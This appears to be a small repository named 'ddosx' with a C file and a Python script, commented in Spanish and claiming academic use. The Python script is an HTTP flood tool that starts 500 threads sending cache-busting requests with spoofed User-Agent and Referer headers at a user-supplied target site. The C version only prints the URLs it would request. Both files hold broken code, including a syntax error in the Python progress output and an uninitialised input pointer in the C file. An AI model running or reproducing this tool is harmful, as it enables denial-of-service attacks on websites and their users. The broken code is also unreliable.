File: ddosx/ddosx.c


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <time.h>

#define RESET   "\033[0m"
#define RED     "\033[31m"
#define BLUE    "\033[34m"
#define YELLOW  "\033[33m"

char *buildblock(int size) {
    char *out_str = malloc(size + 1);
    if(out_str == NULL) {
        printf("Error de asignación de memoria\n");
        exit(1);
    }
    for (int i = 0; i < size; i++) {
        out_str[i] = rand() % 26 + 'A';
    }
    out_str[size] = '\0';
    return out_str;
}

void print_progress(char *symbol, int percent) {
    printf("\r[%s%.*s%s%.*s] %d%%", RED, percent/10, "==========", RESET, 10 - percent/10, "          ", percent);
    fflush(stdout);
}

void delay(int seconds) {
    sleep(seconds);
}

void *httpcall(void *arg) {
    char *url = (char *)arg;
    int code = 0;
    char *user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36";
    char *referer = "http://www.google.com/?q=";
    struct timespec wait_time = {0, 100000000}; // 100 milliseconds

    while(1) {
        if (url[strlen(url) - 1] != '/') {
            strcat(url, "/");
        }
        char *request_url = malloc(strlen(url) + 50); // allocate memory for request URL
        sprintf(request_url, "%s?%s=%s", url, buildblock(rand() % 8 + 3), buildblock(rand() % 8 + 3));
        
        // Send HTTP request
        printf("Sending request to: %s\n", request_url);
        // Simulate some delay
        nanosleep(&wait_time, NULL);
        
        free(request_url);
    }
    return NULL;
}

void *monitor(void *arg) {
    int previous = 0;
    int *request_counter = (int *)arg;
    struct timespec wait_time = {1, 0}; // 1 second

    while (1) {
        if (*request_counter > previous + 100) {
            printf("%d Requests Sent\n", *request_counter);
            previous = *request_counter;
        }
        // Simulate some delay
        nanosleep(&wait_time, NULL);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    char *web;
    int request_counter = 0;
    pthread_t http_thread, monitor_thread;

    printf("\n\n");
    print_progress("", 0);
    delay(1);
    for (int i = 10; i <= 100; i += 10) {
        print_progress("=", i);
        delay(1);
    }
    printf("\n    [===============     ] 85%%\n");
    delay(1);
    printf("    [====================] 100%%\n");
    delay(3);
    printf("Loading %s[%s==========]%s 100%%\n", BLUE, RED, RESET);
    delay(2);

    if (argc < 2) {
        printf("Ingresa Web Objetivo: ");
        scanf("%s", web);
    } else {
        web = argv[1];
    }

    printf("Web elegida: %s\n", web);

    // Create threads
    pthread_create(&http_thread, NULL, httpcall, (void *)web);
    pthread_create(&monitor_thread, NULL, monitor, (void *)&request_counter);

    // Join threads
    pthread_join(http_thread, NULL);
    pthread_join(monitor_thread, NULL);

    return 0;
}

File: ddosx/ddosx.py
# ddosx
# Este software es con fines academicos


import time
from  colorama import  Fore, Style
import urllib.request
import sys
import threading
import random
import re
import useragents 

print("")
print("")
print(Fore.RED + "[" + Fore.RESET + "                         " + Fore.RED + "]" + Fore.BLUE + " 0"  + Fore.RED + "%")
print(Fore.RED + "[" + Fore.RESET +       "                 " + Fore.RED  + "]" +             Fore.RESET + "" + Fore.BLUE + "10" +                   Fore.RESET + "" + Fore.RED + "%")
#print(Fore.RED + "[" + Fore.RESET + "" + Fore.BLUE + "=" + Fore.RESET + "                " +Fore.RESET + "" + Fore.RED "]" + Fore.RESET "" + Fore.BLUE + "10" + Fore.RESER + "" + Fore.RED + "%")
time.sleep(1)
print("    [=                   ] 10%")
time.sleep(1)
print("    [==                  ] 20%")
time.sleep(1)
print("    [===                 ] 30%")
time.sleep(1)
print("    [====                ] 40%")
time.sleep(1)
print("    [=====               ] 50%")
time.sleep(1)
print("    [======              ] 60%")
time.sleep(1)
print("    [=======             ] 70%")
time.sleep(1)
print("    [========            ] 80%")
time.sleep(1)
print("    [===============     ] 85%")
time.sleep(1)
print("    [====================] 100%")
time.sleep(3)
#print("    Loading [==B=u=n=k=e=r=L=a=n=d]")
print("Loading " + Fore.BLUE + "[" + Fore.RESET + Fore.RED + "=" + Fore.RESET + "=".join("=B=u=n=k=e=r=L=a=n=d")
time.sleep(2)



# global params

web = ''
url = ''
host = ''
target_web = []
headers_useragents = []
headers_referers = []
request_counter = 0
flag = 0
safe = 0


def target_web():
 #   global target_web 
    if len(sys.argv) < 2:
 
        web = input("Ingresa Web Objetivo: ")
    else:
         web = sys.argv[1]

    return web
 
if __name__ == "__main__":
     
     web = target_web()
     print(target_web)
print("Web elegida: ", web)
 
#    global  target_web
 #   target_web.append(web)

def inc_counter():
    global request_counter
    request_counter += 1

def set_flag(val):
    global flag
    flag = val

def set_safe():
    global safe
    safe = 1

def useragent_list():
    global headers_useragents
selected_user_agent =  random.choice(useragents.user_agents_list)
headers_useragents.append(selected_user_agent)
print(Fore.YELLOW + "User-Agent seleccionado: " + Style.RESET_ALL, Fore.RED +  selected_user_agent + Style.RESET_ALL)

def referer_list():
    global headers_referers
    headers_referers.append('http://www.google.com/?q=')
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    # Add more referers as needed
    return headers_referers

def buildblock(size):
    out_str = ''
    for i in range(size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return out_str

def usage():
    print('---------------------------------------------------')
    print('USO: python bunker.py <url>')
    print('Añade "seguridad" a la url, vulnerabilizándola con dos')
    print('---------------------------------------------------')

def httpcall(url):
    useragent_list()
    referer_list()
    code = 0
    if url.count("?") > 0:
        param_joiner = "&"
    else:
        param_joiner = "?"
    request = urllib.request.Request(url + param_joiner + buildblock(random.randint(3, 10)) + '=' + buildblock(random.randint(3, 10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5, 10)))
    request.add_header('Keep-Alive', str(random.randint(110, 120)))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host', host)
    try:
        urllib.request.urlopen(request)
    except urllib.error.HTTPError as e:
        set_flag(1)
        print('Respondió Code 500')
        code = 500
    except urllib.error.URLError as e:
        print(e.reason)
        sys.exit()
    else:
        inc_counter()
    return code

class HTTPThread(threading.Thread):
    def run(self):
        try:
            while flag < 2:
                code = httpcall(url)
                if code == 500 and safe == 1:
                    set_flag(2)
        except Exception as ex:
            pass

class MonitorThread(threading.Thread):
    def run(self):
        previous = request_counter
        while flag == 0:
            if previous + 100 < request_counter and previous != request_counter:
                print("%d Requests Sent" % request_counter)
                previous = request_counter
        if flag == 2:
            print("\n-- Ataque Bunker Finalizado --")

if len(sys.argv) < 2:
    usage()
    sys.exit()
else:
    if sys.argv[1] == "help":
        usage()
        sys.exit()
    else:
        print("-- Ataque Bunker Iniciado --")
        if len(sys.argv) == 3:
            if sys.argv[2] == "safe":
                set_safe()
        url = sys.argv[1]
        if url.count("/") == 2:
           #web = target + "/" 
           url = url + "/"
           m = re.search('(https?://)?([^/]*)/?.*', url)
           host = m.group(2)
        for i in range(500):
            t = HTTPThread()
            t.start()
        t = MonitorThread()
        t.start()

